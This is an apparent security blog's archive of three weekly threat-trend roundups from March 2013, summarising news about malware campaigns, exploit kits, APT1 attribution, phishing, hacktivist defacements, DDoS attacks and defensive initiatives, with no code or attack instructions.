Wednesday, March 20, 2013

Weekly Threat Trends March 11-18 2013

Vulnerabilities, Tools, and Tactics

Android app developer licenses being sold in malware black market for $100 each, providing buyers “unfettered access to the official Google Play app store.” At least one purchase, accredited to a banking Trojan author has been leaked.

Malware authors using fictitious business created legally in Brazil to generate application certificates, using them to sign malware to evade detection.

According to a report by Websense, 85% of websites used in attacks during 2012 were “legitimate sites.”

Related: Israeli website for “international institute for counter-terrorism used in wateringhole attack to deliver malware.

Seagate blog website used to serve malware

Fake Bank of America Online Digital Certificate themed emails used in phishing attack.

Travnet Trojan implicated in APT campaign

Blackhole, Sweet Orange, and Cool exploit kits named top weapons for cyber crooks

ArchiveLock Trojan used in France and Spain targeted attacks to encrypt the files of users, demanding $5,000 ransom

Adversary Activity & Campaigns

Decoy ICS/SCADA Water Utility Networks hit by attacks

Warning of vulnerabilities among California energy providers

US Department of State and Pentagon’s Army National Guard websites hacked through SQL injection and XSS scripting attacks by Tunisian Cyber Army with assistance from Al Qaida Electronic Army. Purpose appears to be to gain information for upcoming OpBlackSummer, which the attackers claim us being coordinated with Chinese hackers.

APT1 Watch: Royal Bank of Australia (RBA), documents released in 2012 acknowledge victim status of at least two breaches in 2011 with close connections to APT1.

ADP Package Delivery Notification phishing attack directs victims to Blackhole Exploit Kit websites

Cyber Attack heads-up: campaign announced to “wipe Israel from the Internet on April 7, 2013.

Bank watch: JP Morgan Chase website taken down through denial-of-service

US NIST National Vulnerability Database hacked and taken offline for days

Continued in reports of hacktivism

42 Russian websites hacked by SiR Abdou

Celebrity financial information and social security numbers leaked following hack of free credit report provider

OpBlackSummer: US Govnerment sites hacked - Possible preparation for larger event

Toshiba Turkey Website defaced by reMin hacker

Anonymous takes down political party website in Italy

Indian Hacker “Godzilla” infiltrates Pakistan government websites and leaks information

Service Center Website of Acer Thailand defaced by Turkish hacker

Anonymous attacks Philippines President and related government websites

Poland Sergianist hackers destroy popular Traditionalist website

Syrian Cyber Eagles defaces Saudi General Authority for Tourism and Antiquities website

Anonymous defaces Philippines National Telecommunications Commission website

152 Spanish websites hacked in protest against the deaths of 7 Moroccan immigrants    

Defense and Response News

Pentagon creating new teams to launch cyberattacks

UK develops global cyber security capacity, supported by the ICSPA;Z1DVQo

HBGary releases virtual classroom for incident response professional

Cyber-attacks eclipse terrorism in impact according to US leaders

Friday, March 15, 2013

Weekly Threat Trends March 3-11 2013

Vulnerabilities, Tools, and Tactics

Rogue Apache modules appear to be the source of a surge in iFrame injection attacks targeting legitimate websites like those used in the compromise, to drive traffic to the Blackhole exploit kit. How the rogue modules are being injected is still unknown:

Malicious Java applet uses certificate stolen from Clearesult Consulting to exploit trust and install automatically:

A report released from Cenzic claims 99% of web applications remain vulnerable to attacks, calling for increased emphasis on mitigation:

Free malicious Java applet generating tool discovered in the wild. The tool can clone a legitimate website, creates a malicious java applet, then redirect victims to a site of the attackers choice:

Web browser proxy auto-configuration tactic used in recent banking campaigns in Brazil to capture and redirect certain user traffic, expected to increase in use globally.

Example of Android mobile malware commoditization found in an ad for the tool “perkele lite,” used to intercept and forward SMS messages.

Adversary Activity & Campaigns

Bank DDoS attacks resume: Izz ad-Din al-Qassam, believed to be directly supported by the Iranian government, announced and began execution of a new phase of attacks targeting US banks. ,

Emerging phishing campaigns, exploiting payroll and banking trustADP TotalSource Payroll Invoice: Bank of America:

Targeted attack against Australia’s central bank, Reserve Bank of Australia (RBA) succeeded in compromising at least one system. Target of the attack was information which included Group of 20 negotiations. China is implicated.

Kaspersky discovers AlbaBotnet being used to target Chilean banks in an emerging campaign.

APT-1: Industry reporting attribution of past campaigns to APT-1, including US, Japan, and India victims, thanks to indicators from Mandiant’s report. One example: , ,

Surge in reports of hacktivism

Czech central bank, stock exchange, banks hacked: defaces Time Warner Cable: Gulf Oil Company (Agoco) by QuisterTow: Aramco Twitter account hacked: Israeli sites hacked and defaced: 180 Egypt sites hacked by P@khTuN:

Defense and Response News

China, in response to Mandiant and related APT-1 claims, begins a response campaign claiming they are the victim of repeated US sourced intrusions, calls for new international agreements on cyber: ,

Deutsche Telekom unveils real-time map of global cyber-attacks detected on their global infrastructure:

Microsoft launches new Cybercrime Center to combat piracy and malware:

New cyber security, forensics center formed by UMASS to advance research on cyber security and forensics theory:

Prolexic successfully defends against large scale DDoS against utility:

Monday, March 4, 2013

Weekly Open Source Threat Report - 2/26/2013 - 3/3/2013

Vulnerabilities, Tools, and Tactics

MiniDuke malware discovered by Kaspersky and CrySys, has infected government computers from numerous nations. The malware was delivered through PDFs containing exploits written for Adobe Reader versions 9, 10, and 11. Researchers have not revealed the nature or mission of the malware yet.

Multiple Java 0-Days released last week with ties to Bit9 hack from the previous week. Articles from FireEye reference the malware as McRAT.

Adversary Activity & Campaigns

Chinese attackers from Mandiant’s APT1 targeted 23 US energy infrastructure companies during a 2011-2012 campaign, exfiltrating data which would allow them to access and control oil and natural gas industrial-control systems.

Anonymous gained access to and published email communications between a contractor and Bank of America security staff exposing a monitoring program intended to keep tabs on the hacktivist group. The “hack” wasn’t a breach of BofA systems as Anonymous reported the server they obtained the emails from was open to external access and controlled by the security researcher.

Evernote hacked, data on 50 million users exposed including usernames and passwords. Change your password now!

Crescent healthcare confirms breach of patient records and social security numbers. Breach occurred on December 28, 2012, however Crescent will not release information on how it happened.

Sabah land dispute conflict transitions from physical to cyber as forces from Malaysia and the Philippines target each other’s government websites.

Team Cymru uncovers a state-controlled cyber campaign leaking 1 Terabyte of data every day from US based systems to foreign countries. Report is currently private, details to follow.

Defense and Response News

Offensive security group CrowdStrike takes over and shuts down the Kelihos botnet with 110,000 infected nodes. CrowdStrike used a DNS injection attack to redirect the command and control channels used by infected systems, notified all the victims, and shut down the botnet in an offensive campaign.

Increased calls from public for improved collaboration between government, private, and public cyber security organizations to defend against adversaries like Mandiant’s APT1.

IDF defines Cyber Warfare as the 5th realm of warfare and established Cyber Command, bridging forces from the Intelligence and Teleprocessing branches.

Australia joins the Council of Europe Convention on Cybercrime following the passing of the Cybercrime Legislation Amendment Bill 2011. Among other empowerments, the legislation requires ISPs to store data on persons deemed under suspicion by law-enforcement.